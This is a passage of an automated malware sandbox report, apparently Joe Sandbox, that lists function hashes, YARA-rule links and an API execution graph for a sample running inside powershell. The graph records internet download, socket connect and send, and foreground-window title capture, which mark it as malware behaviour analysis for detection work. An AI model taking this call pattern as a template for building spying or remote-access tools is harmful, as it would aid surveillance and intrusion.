                          • API ID:
                          • String ID: 4'p$4'p
                          • API String ID: 0-3973980265
                          • Opcode ID: 0648a8353a072078af4dab97c14b8bb3f04988a8cfd843292d792675a484bd72
                          • Instruction ID: 992cd22fb56282c7de04529d8418ee2b86a9293f50bdff700394a089d5cb4880
                          • Opcode Fuzzy Hash: 0648a8353a072078af4dab97c14b8bb3f04988a8cfd843292d792675a484bd72
                          • Instruction Fuzzy Hash: A7613A75E016099FD709EF6AEC5568EBBF2AFC8300F04C829D5149B269EB3459068F90
                          Function 0026895D Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382408222.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'p$4'p
                          • API String ID: 0-3973980265
                          • Opcode ID: 347f59bb38a1ad6960276b906225e44a53ca25267f739824d07ffb49a62cf55d
                          • Instruction ID: 9433527c4a9edbcf356a8349673c639fb9573074252025cd3a88dd5983b5f39b
                          • Opcode Fuzzy Hash: 347f59bb38a1ad6960276b906225e44a53ca25267f739824d07ffb49a62cf55d
                          • Instruction Fuzzy Hash: B3713A75E016099FD70AEF6AEC5568DBBF2AFC8300F04C829D5149B269EB7459068F90
                          Function 0026E608 Relevance: 1.7, Strings: 1, Instructions: 459COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382408222.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: UUUU
                          • API String ID: 0-1798160573
                          • Opcode ID: 6c3e7f5a13c34908a8470e5b51620dbeddff9c2a453f0c2114e8337d81cc7511
                          • Instruction ID: 3705a84a622c108fbf428c3f3baa6653c24f2922fa3e6c38b746d221537f38e6
                          • Opcode Fuzzy Hash: 6c3e7f5a13c34908a8470e5b51620dbeddff9c2a453f0c2114e8337d81cc7511
                          • Instruction Fuzzy Hash: 25129275E106598BDB58CFAEC98059DFBF2BF88304F28C529D418EB21AD734A946CF50
                          Function 00268C18 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382408222.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: Dp
                          • API String ID: 0-2141643023
                          • Opcode ID: aaeb1f9d104dc580cfede5ac3f8472a82148c300f4384a93e2db5a6ff96cb954
                          • Instruction ID: e66cb52151d9e5eabf1f24a5ed66619c67c3358435e0999e19e26266e377f8a1
                          • Opcode Fuzzy Hash: aaeb1f9d104dc580cfede5ac3f8472a82148c300f4384a93e2db5a6ff96cb954
                          • Instruction Fuzzy Hash: 9DD1A174A00219CFDB54DFA9D994B9DBBF2BF88300F2085A9E409AB365DB359D81CF50
                          Function 00268C08 Relevance: 1.5, Strings: 1, Instructions: 213COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382408222.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: Dp
                          • API String ID: 0-2141643023
                          • Opcode ID: e2d13c657a52a72e672eb1a344f1accd6b75b148e6bf0cad4a0beefde7d7b1ca
                          • Instruction ID: fb1aba398912c795d3a184f98b026149a7317581e448b96b8eedf0fa43bbf352
                          • Opcode Fuzzy Hash: e2d13c657a52a72e672eb1a344f1accd6b75b148e6bf0cad4a0beefde7d7b1ca
                          • Instruction Fuzzy Hash: B6A1E274A10218CFDB58DF69D894B9DBBF2BF89300F1085A9E409AB365DB31AD85CF50
                          Function 0026908F Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382408222.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_260000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: G
                          • API String ID: 0-985283518
                          • Opcode ID: bfe3dd8000fd022ff0b6ce9da432cba1ecc41f5dbe273c1eefc94cdfa934c80e
                          • Instruction ID: c5b9298123fa7639b58eda3fd564f1261fe55ba628086762ff876fca5bcdca03
                          • Opcode Fuzzy Hash: bfe3dd8000fd022ff0b6ce9da432cba1ecc41f5dbe273c1eefc94cdfa934c80e
                          • Instruction Fuzzy Hash: A43147B1D156298BDB18CF6ACC4439EBBF6BFC9300F14C0AAC908A6251DB340A85CF15
                          Function 004200A0 Relevance: 21.7, Strings: 17, Instructions: 415COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382501935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_420000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 8($ 8($ 8($4'p$4'p$<:($D8($D8($D8($L4p$L4p$L4p$L4p$L4p$L4p$$p$$p
                          • API String ID: 0-3248981073
                          • Opcode ID: 068cb7ef9c9cd49562c2aace683b3477bf28f55ff34218ae9dfe4c332b4d82f1
                          • Instruction ID: ab850522dcc3092d2b8c4d63fbeac9613cb45200c44af989d8bb6bfa70883a53
                          • Opcode Fuzzy Hash: 068cb7ef9c9cd49562c2aace683b3477bf28f55ff34218ae9dfe4c332b4d82f1
                          • Instruction Fuzzy Hash: 4EE14A31B00214DFCB299E68E85076F7BE2AFC5310F948467E9418B392CB79DD41C7A6
                          Function 004234B0 Relevance: 15.4, Strings: 12, Instructions: 367COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382501935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_420000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'p$4'p$4'p$4'p$4'p$4'p$tPp$tPp$$p$$p$$p$$p
                          • API String ID: 0-970164409
                          • Opcode ID: 1434869421ad477274012746c4972e78db0ca734f5cd1179b82a7519d228226d
                          • Instruction ID: be90fb20bfe14cd3847a915d646e1475b39149a13d813bfcedf4e5adb9de4940
                          • Opcode Fuzzy Hash: 1434869421ad477274012746c4972e78db0ca734f5cd1179b82a7519d228226d
                          • Instruction Fuzzy Hash: 7FC11631B043609FCB259E69A400B6BBFB1AFC5312FA8806FD5458B341DA7DCE46C796
                          Function 00422B10 Relevance: 8.8, Strings: 7, Instructions: 89COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382501935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_420000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: @9($@9($@X$@X$$p$$p$$p
                          • API String ID: 0-2659305391
                          • Opcode ID: 7aeccb3c93a888d3dc90e4f6ac979ffcb1b593b0ba3c9120560c9c4a93d3924c
                          • Instruction ID: 485f69243f2570bacfa8b6abe774815ee3063bfefedc36993a3e8c916a720232
                          • Opcode Fuzzy Hash: 7aeccb3c93a888d3dc90e4f6ac979ffcb1b593b0ba3c9120560c9c4a93d3924c
                          • Instruction Fuzzy Hash: C32144357003206BC7285D69A90073BABEA9FC4710FA4842FE849CB380CEF5EC01C369
                          Function 004205C8 Relevance: 6.5, Strings: 5, Instructions: 248COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382501935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_420000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: L4p$L4p$L4p$$p$$p
                          • API String ID: 0-1328183328
                          • Opcode ID: f4ca6ab07af24b218b6607e15b953705a10f493ff2ec33f198816d01666b6da0
                          • Instruction ID: b0de1b2882b02d0d27261f8c3116e83829c1fccd70e16df47623bbc851da425d
                          • Opcode Fuzzy Hash: f4ca6ab07af24b218b6607e15b953705a10f493ff2ec33f198816d01666b6da0
                          • Instruction Fuzzy Hash: 838138357003549FCB259A68E85076BBBE2AFC1300FA8847BD9418B393DB74DD45CB9A
                          Function 00420001 Relevance: 6.4, Strings: 5, Instructions: 171COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382501935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_420000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 8($ 8($L4p$L4p$L4p
                          • API String ID: 0-1077449709
                          • Opcode ID: 2e26c119da58dd8f114f6585edab2f149352687621518f4c7b606548f1b749fd
                          • Instruction ID: 5a61418fd25629bebc79cb1b42aed3f1fe0d336c7c92b24f379849b34ca3ec43
                          • Opcode Fuzzy Hash: 2e26c119da58dd8f114f6585edab2f149352687621518f4c7b606548f1b749fd
                          • Instruction Fuzzy Hash: 585191716093D49FDB168A24A81476A7FB29F43300F9981DBD8818B2E3C779CC45CB66
                          Function 004202E4 Relevance: 6.4, Strings: 5, Instructions: 117COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382501935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_420000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: D8($D8($L4p$L4p$L4p
                          • API String ID: 0-2887981545
                          • Opcode ID: 1ee4b7c4abbd28b88bff3f93c144bb095de3287d933c40e7dcf658d0994e0503
                          • Instruction ID: ce41fc34f53a8aae535be6cad70997eb022fb33df0efd540f0df46a7a447afc4
                          • Opcode Fuzzy Hash: 1ee4b7c4abbd28b88bff3f93c144bb095de3287d933c40e7dcf658d0994e0503
                          • Instruction Fuzzy Hash: 2D419335B01254DFDF24DA54E444BAA7BE2AF80300F988167E9055B392C7B8DD85CB96
                          Function 00422AF1 Relevance: 5.1, Strings: 4, Instructions: 72COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.382501935.0000000000420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_420000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: @9($@9($$p$$p
                          • API String ID: 0-852208089
                          • Opcode ID: 519adfc6f275083f8088a0831ddfdade8b66df3affc1a08df8dd6e3435f459e9
                          • Instruction ID: e63cbdbb8511c4e0a2efeaba22d051a2e9ea3e761a8d0ad2ef9cb08d796979a3
                          • Opcode Fuzzy Hash: 519adfc6f275083f8088a0831ddfdade8b66df3affc1a08df8dd6e3435f459e9
                          • Instruction Fuzzy Hash: 0C215B307083902FCB224E35591077BBFB19FC2710F98849BE884CB3D2D6A89D09C325

                          Execution Graph

                          Execution Coverage:6.3%
                          Dynamic/Decrypted Code Coverage:16.4%
                          Signature Coverage:3.4%
                          Total number of Nodes:1821
                          Total number of Limit Nodes:56
                          execution_graph 53071 415d41 53086 41b411 53071->53086 53073 415d4a 53097 4020f6 53073->53097 53078 4170c4 53121 401e8d 53078->53121 53082 401fd8 11 API calls 53083 4170d9 53082->53083 53084 401fd8 11 API calls 53083->53084 53085 4170e5 53084->53085 53127 4020df 53086->53127 53091 41b456 InternetReadFile 53092 41b479 53091->53092 53092->53091 53094 41b4a6 InternetCloseHandle InternetCloseHandle 53092->53094 53096 401fd8 11 API calls 53092->53096 53138 4020b7 53092->53138 53095 41b4b8 53094->53095 53095->53073 53096->53092 53098 40210c 53097->53098 53099 4023ce 11 API calls 53098->53099 53100 402126 53099->53100 53101 402569 28 API calls 53100->53101 53102 402134 53101->53102 53103 404aa1 53102->53103 53104 404ab4 53103->53104 53205 40520c 53104->53205 53106 404ac9 ctype 53107 404b40 WaitForSingleObject 53106->53107 53108 404b20 53106->53108 53110 404b56 53107->53110 53109 404b32 send 53108->53109 53111 404b7b 53109->53111 53211 4210cb 54 API calls 53110->53211 53114 401fd8 11 API calls 53111->53114 53113 404b69 SetEvent 53113->53111 53115 404b83 53114->53115 53116 401fd8 11 API calls 53115->53116 53117 404b8b 53116->53117 53117->53078 53118 401fd8 53117->53118 53119 4023ce 11 API calls 53118->53119 53120 401fe1 53119->53120 53120->53078 53122 402163 53121->53122 53126 40219f 53122->53126 53229 402730 11 API calls 53122->53229 53124 402184 53230 402712 11 API calls std::_Deallocate 53124->53230 53126->53082 53128 4020e7 53127->53128 53144 4023ce 53128->53144 53130 4020f2 53131 43bda0 53130->53131 53136 4461b8 ___crtLCMapStringA 53131->53136 53132 4461f6 53160 44062d 20 API calls _Atexit 53132->53160 53133 4461e1 RtlAllocateHeap 53135 41b42f InternetOpenW InternetOpenUrlW 53133->53135 53133->53136 53135->53091 53136->53132 53136->53133 53159 443001 7 API calls 2 library calls 53136->53159 53139 4020bf 53138->53139 53140 4023ce 11 API calls 53139->53140 53141 4020ca 53140->53141 53161 40250a 53141->53161 53143 4020d9 53143->53092 53145 402428 53144->53145 53146 4023d8 53144->53146 53145->53130 53146->53145 53148 4027a7 53146->53148 53149 402e21 53148->53149 53152 4016b4 53149->53152 53151 402e30 53151->53145 53153 4016c6 53152->53153 53154 4016cb 53152->53154 53158 43bd68 11 API calls _Atexit 53153->53158 53154->53153 53155 4016f3 53154->53155 53155->53151 53157 43bd67 53158->53157 53159->53136 53160->53135 53162 40251a 53161->53162 53163 402520 53162->53163 53164 402535 53162->53164 53168 402569 53163->53168 53178 4028e8 53164->53178 53167 402533 53167->53143 53189 402888 53168->53189 53170 40257d 53171 402592 53170->53171 53172 4025a7 53170->53172 53194 402a34 22 API calls 53171->53194 53174 4028e8 28 API calls 53172->53174 53177 4025a5 53174->53177 53175 40259b 53195 4029da 22 API calls 53175->53195 53177->53167 53179 4028f1 53178->53179 53180 402953 53179->53180 53181 4028fb 53179->53181 53203 4028a4 22 API calls 53180->53203 53184 402904 53181->53184 53186 402917 53181->53186 53197 402cae 53184->53197 53185 402915 53185->53167 53186->53185 53188 4023ce 11 API calls 53186->53188 53188->53185 53190 402890 53189->53190 53191 402898 53190->53191 53196 402ca3 22 API calls 53190->53196 53191->53170 53194->53175 53195->53177 53198 402cb8 __EH_prolog 53197->53198 53204 402e54 22 API calls 53198->53204 53200 4023ce 11 API calls 53202 402d92 53200->53202 53201 402d24 53201->53200 53202->53185 53204->53201 53206 405214 53205->53206 53207 4023ce 11 API calls 53206->53207 53208 40521f 53207->53208 53212 405234 53208->53212 53210 40522e 53210->53106 53211->53113 53213 405240 53212->53213 53214 40526e 53212->53214 53215 4028e8 28 API calls 53213->53215 53228 4028a4 22 API calls 53214->53228 53217 40524a 53215->53217 53217->53210 53229->53124 53230->53126 53231 10006d60 53232 10006d69 53231->53232 53233 10006d72 53231->53233 53235 10006c5f 53232->53235 53255 10005af6 GetLastError 53235->53255 53237 10006c6c 53275 10006d7e 53237->53275 53239 10006c74 53284 100069f3 53239->53284 53242 10006c8b 53242->53233 53245 10006cce 53309 1000571e 19 API calls _free 53245->53309 53249 10006cc9 53308 10006368 19 API calls _free 53249->53308 53251 10006d12 53251->53245 53311 100068c9 25 API calls 53251->53311 53252 10006ce6 53252->53251 53310 1000571e 19 API calls _free 53252->53310 53256 10005b12 53255->53256 53257 10005b0c 53255->53257 53261 10005b61 SetLastError 53256->53261 53313 1000637b 19 API calls 2 library calls 53256->53313 53312 10005e08 10 API calls 2 library calls 53257->53312 53260 10005b24 53262 10005b2c 53260->53262 53315 10005e5e 10 API calls 2 library calls 53260->53315 53261->53237 53314 1000571e 19 API calls _free 53262->53314 53264 10005b41 53264->53262 53266 10005b48 53264->53266 53316 1000593c 19 API calls _abort 53266->53316 53267 10005b32 53269 10005b6d SetLastError 53267->53269 53318 100055a8 36 API calls _abort 53269->53318 53270 10005b53 53317 1000571e 19 API calls _free 53270->53317 53274 10005b5a 53274->53261 53274->53269 53276 10006d8a ___DestructExceptionObject 53275->53276 53277 10005af6 _abort 36 API calls 53276->53277 53282 10006d94 53277->53282 53279 10006e18 _abort 53279->53239 53282->53279 53319 100055a8 36 API calls _abort 53282->53319 53320 10005671 RtlEnterCriticalSection 53282->53320 53321 1000571e 19 API calls _free 53282->53321 53322 10006e0f RtlLeaveCriticalSection _abort 53282->53322 53323 100054a7 53284->53323 53287 10006a14 GetOEMCP 53289 10006a3d 53287->53289 53288 10006a26 53288->53289 53290 10006a2b GetACP 53288->53290 53289->53242 53291 100056d0 53289->53291 53290->53289 53292 1000570e 53291->53292 53297 100056de _abort 53291->53297 53334 10006368 19 API calls _free 53292->53334 53293 100056f9 RtlAllocateHeap 53295 1000570c 53293->53295 53293->53297 53295->53245 53298 10006e20 53295->53298 53297->53292 53297->53293 53333 1000474f 7 API calls 2 library calls 53297->53333 53299 100069f3 38 API calls 53298->53299 53302 10006e3f 53299->53302 53300 10006e46 53345 10002ada 53300->53345 53301 10006eb5 ___scrt_fastfail 53335 10006acb GetCPInfo 53301->53335 53302->53300 53302->53301 53305 10006e90 IsValidCodePage 53302->53305 53304 10006cc1 53304->53249 53304->53252 53305->53300 53306 10006ea2 GetCPInfo 53305->53306 53306->53300 53306->53301 53308->53245 53309->53242 53310->53251 53311->53245 53312->53256 53313->53260 53314->53267 53315->53264 53316->53270 53317->53274 53320->53282 53321->53282 53322->53282 53324 100054c4 53323->53324 53330 100054ba 53323->53330 53325 10005af6 _abort 36 API calls 53324->53325 53324->53330 53326 100054e5 53325->53326 53331 10007a00 36 API calls __fassign 53326->53331 53328 100054fe 53332 10007a2d 36 API calls __fassign 53328->53332 53330->53287 53330->53288 53331->53328 53332->53330 53333->53297 53334->53295 53340 10006b05 53335->53340 53344 10006baf 53335->53344 53337 10002ada _ValidateLocalCookies 5 API calls 53339 10006c5b 53337->53339 53339->53300 53352 100086e4 53340->53352 53343 10008a3e 41 API calls 53343->53344 53344->53337 53346 10002ae3 53345->53346 53347 10002ae5 IsProcessorFeaturePresent 53345->53347 53346->53304 53349 10002b58 53347->53349 53422 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53349->53422 53351 10002c3b 53351->53304 53353 100054a7 __fassign 36 API calls 53352->53353 53354 10008704 MultiByteToWideChar 53353->53354 53356 10008742 53354->53356 53364 100087da 53354->53364 53359 100056d0 20 API calls 53356->53359 53361 10008763 ___scrt_fastfail 53356->53361 53357 10002ada _ValidateLocalCookies 5 API calls 53360 10006b66 53357->53360 53358 100087d4 53371 10008801 19 API calls _free 53358->53371 53359->53361 53366 10008a3e 53360->53366 53361->53358 53363 100087a8 MultiByteToWideChar 53361->53363 53363->53358 53365 100087c4 GetStringTypeW 53363->53365 53364->53357 53365->53358 53367 100054a7 __fassign 36 API calls 53366->53367 53368 10008a51 53367->53368 53372 10008821 53368->53372 53371->53364 53373 1000883c 53372->53373 53374 10008862 MultiByteToWideChar 53373->53374 53375 10008a16 53374->53375 53376 1000888c 53374->53376 53377 10002ada _ValidateLocalCookies 5 API calls 53375->53377 53380 100056d0 20 API calls 53376->53380 53382 100088ad 53376->53382 53378 10006b87 53377->53378 53378->53343 53379 100088f6 MultiByteToWideChar 53381 1000890f 53379->53381 53398 10008962 53379->53398 53380->53382 53399 10005f19 53381->53399 53382->53379 53382->53398 53386 10008971 53388 100056d0 20 API calls 53386->53388 53391 10008992 53386->53391 53387 10008939 53389 10005f19 10 API calls 53387->53389 53387->53398 53388->53391 53389->53398 53390 10008a07 53407 10008801 19 API calls _free 53390->53407 53391->53390 53393 10005f19 10 API calls 53391->53393 53394 100089e6 53393->53394 53394->53390 53395 100089f5 WideCharToMultiByte 53394->53395 53395->53390 53396 10008a35 53395->53396 53409 10008801 19 API calls _free 53396->53409 53408 10008801 19 API calls _free 53398->53408 53410 10005c45 53399->53410 53401 10005f40 53402 10005f49 53401->53402 53414 10005fa1 9 API calls 2 library calls 53401->53414 53405 10002ada _ValidateLocalCookies 5 API calls 53402->53405 53404 10005f89 LCMapStringW 53404->53402 53406 10005f9b 53405->53406 53406->53386 53406->53387 53406->53398 53407->53398 53408->53375 53409->53398 53411 10005c71 53410->53411 53413 10005c75 __crt_fast_encode_pointer 53410->53413 53411->53413 53415 10005ce1 53411->53415 53413->53401 53414->53404 53416 10005d02 LoadLibraryExW 53415->53416 53420 10005cf7 53415->53420 53417 10005d37 53416->53417 53418 10005d1f GetLastError 53416->53418 53417->53420 53421 10005d4e FreeLibrary 53417->53421 53418->53417 53419 10005d2a LoadLibraryExW 53418->53419 53419->53417 53420->53411 53421->53420 53422->53351 53423 434906 53428 434bd8 SetUnhandledExceptionFilter 53423->53428 53425 43490b pre_c_initialization 53429 4455cc 20 API calls 2 library calls 53425->53429 53427 434916 53428->53425 53429->53427 53430 416be6 53450 401e65 53430->53450 53432 416bf2 53433 416c07 53432->53433 53434 416c1e 53432->53434 53435 401e65 22 API calls 53433->53435 53436 401e65 22 API calls 53434->53436 53437 416c0c 53435->53437 53438 416c23 53436->53438 53439 4020f6 28 API calls 53437->53439 53440 4020f6 28 API calls 53438->53440 53441 416c17 53439->53441 53440->53441 53455 417308 53441->53455 53444 401e8d 11 API calls 53445 4170cd 53444->53445 53446 401fd8 11 API calls 53445->53446 53447 4170d9 53446->53447 53448 401fd8 11 API calls 53447->53448 53449 4170e5 53448->53449 53451 401e6d 53450->53451 53452 401e75 53451->53452 53489 402158 22 API calls 53451->53489 53452->53432 53456 4174c0 53455->53456 53457 41731e 53455->53457 53458 401fd8 11 API calls 53456->53458 53490 4046f7 53457->53490 53460 416c38 53458->53460 53460->53444 53464 4174b2 53599 404ee2 99 API calls 53464->53599 53469 417365 53566 402ea1 53469->53566 53472 404aa1 61 API calls 53473 417380 53472->53473 53474 401fd8 11 API calls 53473->53474 53475 417388 53474->53475 53476 401fd8 11 API calls 53475->53476 53478 417390 53476->53478 53481 41bdaf 28 API calls 53478->53481 53482 4020b7 28 API calls 53478->53482 53483 402ea1 28 API calls 53478->53483 53484 404aa1 61 API calls 53478->53484 53486 401fd8 11 API calls 53478->53486 53487 4174a7 53478->53487 53575 41b80c GlobalMemoryStatusEx 53478->53575 53576 41b890 GetSystemTimes Sleep GetSystemTimes 53478->53576 53578 41bb27 53478->53578 53583 401f09 53478->53583 53481->53478 53482->53478 53483->53478 53484->53478 53486->53478 53586 404e26 WaitForSingleObject 53487->53586 53491 4020df 11 API calls 53490->53491 53492 404707 53491->53492 53493 4020df 11 API calls 53492->53493 53494 40471e 53493->53494 53495 404736 53494->53495 53600 40482d 53494->53600 53497 4048c8 connect 53495->53497 53498 404a1b 53497->53498 53499 4048ee 53497->53499 53500 40497e 53498->53500 53501 404a21 WSAGetLastError 53498->53501 53499->53500 53502 404923 53499->53502 53608 40531e 53499->53608 53500->53464 53557 41bdaf 53500->53557 53501->53500 53503 404a31 53501->53503 53643 420cf1 27 API calls 53502->53643 53505 404932 53503->53505 53506 404a36 53503->53506 53511 402093 28 API calls 53505->53511 53648 41cb72 30 API calls 53506->53648 53508 40490f 53613 402093 53508->53613 53510 40492b 53510->53505 53514 404941 53510->53514 53515 404a80 53511->53515 53513 404a40 53649 4052fd 28 API calls 53513->53649 53521 404950 53514->53521 53522 404987 53514->53522 53518 402093 28 API calls 53515->53518 53523 404a8f 53518->53523 53525 402093 28 API calls 53521->53525 53645 421ad1 54 API calls 53522->53645 53526 41b580 80 API calls 53523->53526 53529 40495f 53525->53529 53526->53500 53532 402093 28 API calls 53529->53532 53530 40498f 53533 4049c4 53530->53533 53534 404994 53530->53534 53536 40496e 53532->53536 53647 420e97 28 API calls 53533->53647 53538 402093 28 API calls 53534->53538 53541 41b580 80 API calls 53536->53541 53540 4049a3 53538->53540 53543 402093 28 API calls 53540->53543 53544 404973 53541->53544 53542 4049cc 53545 4049f9 CreateEventW CreateEventW 53542->53545 53547 402093 28 API calls 53542->53547 53546 4049b2 53543->53546 53644 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53544->53644 53545->53500 53548 41b580 80 API calls 53546->53548 53550 4049e2 53547->53550 53551 4049b7 53548->53551 53552 402093 28 API calls 53550->53552 53646 421143 52 API calls 53551->53646 53554 4049f1 53552->53554 53555 41b580 80 API calls 53554->53555 53556 4049f6 53555->53556 53556->53545 53558 41bdbc 53557->53558 53559 4020b7 28 API calls 53558->53559 53560 41734f 53559->53560 53561 402f31 53560->53561 53562 4020df 11 API calls 53561->53562 53563 402f3d 53562->53563 53564 4032a0 28 API calls 53563->53564 53565 402f59 53564->53565 53565->53469 53571 402eb0 53566->53571 53567 402ef2 53568 401fb0 28 API calls 53567->53568 53569 402ef0 53568->53569 53570 402055 11 API calls 53569->53570 53572 402f09 53570->53572 53571->53567 53573 402ee7 53571->53573 53572->53472 53708 403365 28 API calls 53573->53708 53575->53478 53577 41b8d5 _swprintf __aulldiv 53576->53577 53577->53478 53709 436f10 53578->53709 53584 402252 11 API calls 53583->53584 53585 401f12 53584->53585 53585->53478 53587 404e40 SetEvent CloseHandle 53586->53587 53588 404e57 closesocket 53586->53588 53589 404ed8 53587->53589 53590 404e64 53588->53590 53589->53464 53591 404e7a 53590->53591 53758 4050e4 84 API calls 53590->53758 53592 404e8c WaitForSingleObject 53591->53592 53593 404ece SetEvent CloseHandle 53591->53593 53759 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53592->53759 53593->53589 53596 404e9b SetEvent WaitForSingleObject 53760 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53596->53760 53598 404eb3 SetEvent CloseHandle CloseHandle 53598->53593 53601 404846 socket 53600->53601 53602 404839 53600->53602 53603 404860 CreateEventW 53601->53603 53604 404842 53601->53604 53607 40489e WSAStartup 53602->53607 53603->53495 53604->53495 53606 40483e 53606->53601 53606->53604 53607->53606 53609 4020df 11 API calls 53608->53609 53610 40532a 53609->53610 53650 4032a0 53610->53650 53612 405346 53612->53508 53614 40209b 53613->53614 53615 4023ce 11 API calls 53614->53615 53616 4020a6 53615->53616 53654 4024ed 53616->53654 53619 41b580 53620 41b631 53619->53620 53621 41b596 GetLocalTime 53619->53621 53623 401fd8 11 API calls 53620->53623 53622 40531e 28 API calls 53621->53622 53624 41b5d8 53622->53624 53625 41b639 53623->53625 53658 406383 53624->53658 53627 401fd8 11 API calls 53625->53627 53628 41b641 53627->53628 53628->53502 53632 406383 28 API calls 53633 41b5fc 53632->53633 53668 40723b 77 API calls 53633->53668 53635 41b60a 53636 401fd8 11 API calls 53635->53636 53637 41b616 53636->53637 53638 401fd8 11 API calls 53637->53638 53639 41b61f 53638->53639 53640 401fd8 11 API calls 53639->53640 53641 41b628 53640->53641 53642 401fd8 11 API calls 53641->53642 53642->53620 53643->53510 53644->53500 53645->53530 53646->53544 53647->53542 53648->53513 53652 4032aa 53650->53652 53651 4032c9 53651->53612 53652->53651 53653 4028e8 28 API calls 53652->53653 53653->53651 53655 4024f9 53654->53655 53656 40250a 28 API calls 53655->53656 53657 4020b1 53656->53657 53657->53619 53669 4051ef 53658->53669 53660 406391 53673 402055 53660->53673 53663 402f10 53705 401fb0 53663->53705 53665 402f1e 53666 402055 11 API calls 53665->53666 53667 402f2d 53666->53667 53667->53632 53668->53635 53670 4051fb 53669->53670 53679 405274 53670->53679 53672 405208 53672->53660 53674 402061 53673->53674 53675 4023ce 11 API calls 53674->53675 53676 40207b 53675->53676 53701 40267a 53676->53701 53680 405282 53679->53680 53681 405288 53680->53681 53682 40529e 53680->53682 53690 4025f0 53681->53690 53683 4052f5 53682->53683 53686 4052b6 53682->53686 53699 4028a4 22 API calls 53683->53699 53688 4028e8 28 API calls 53686->53688 53689 40529c 53686->53689 53688->53689 53689->53672 53691 402888 22 API calls 53690->53691 53692 402602 53691->53692 53693 402672 53692->53693 53694 402629 53692->53694 53700 4028a4 22 API calls 53693->53700 53696 4028e8 28 API calls 53694->53696 53698 40263b 53694->53698 53696->53698 53698->53689 53702 40268b 53701->53702 53703 4023ce 11 API calls 53702->53703 53704 40208d 53703->53704 53704->53663 53706 4025f0 28 API calls 53705->53706 53707 401fbd 53706->53707 53707->53665 53708->53569 53710 41bb46 GetForegroundWindow GetWindowTextW 53709->53710 53711 40417e 53710->53711 53712 404186 53711->53712 53717 402252 53712->53717 53714 404191 53721 4041bc 53714->53721 53718 40225c 53717->53718 53719 4022ac 53717->53719 53718->53719 53725 402779 11 API calls std::_Deallocate 53718->53725 53719->53714 53722 4041c8 53721->53722 53726 4041d9 53722->53726 53724 40419c 53724->53478 53725->53719 53727 4041e9 53726->53727 53728 404206 53727->53728 53729 4041ef 53727->53729 53743 4027e6 53728->53743 53733 404267 53729->53733 53732 404204 53732->53724 53734 402888 22 API calls 53733->53734 53735 40427b 53734->53735 53736 404290 53735->53736 53737 4042a5 53735->53737 53754 4042df 22 API calls 53736->53754 53738 4027e6 28 API calls 53737->53738 53742 4042a3 53738->53742 53740 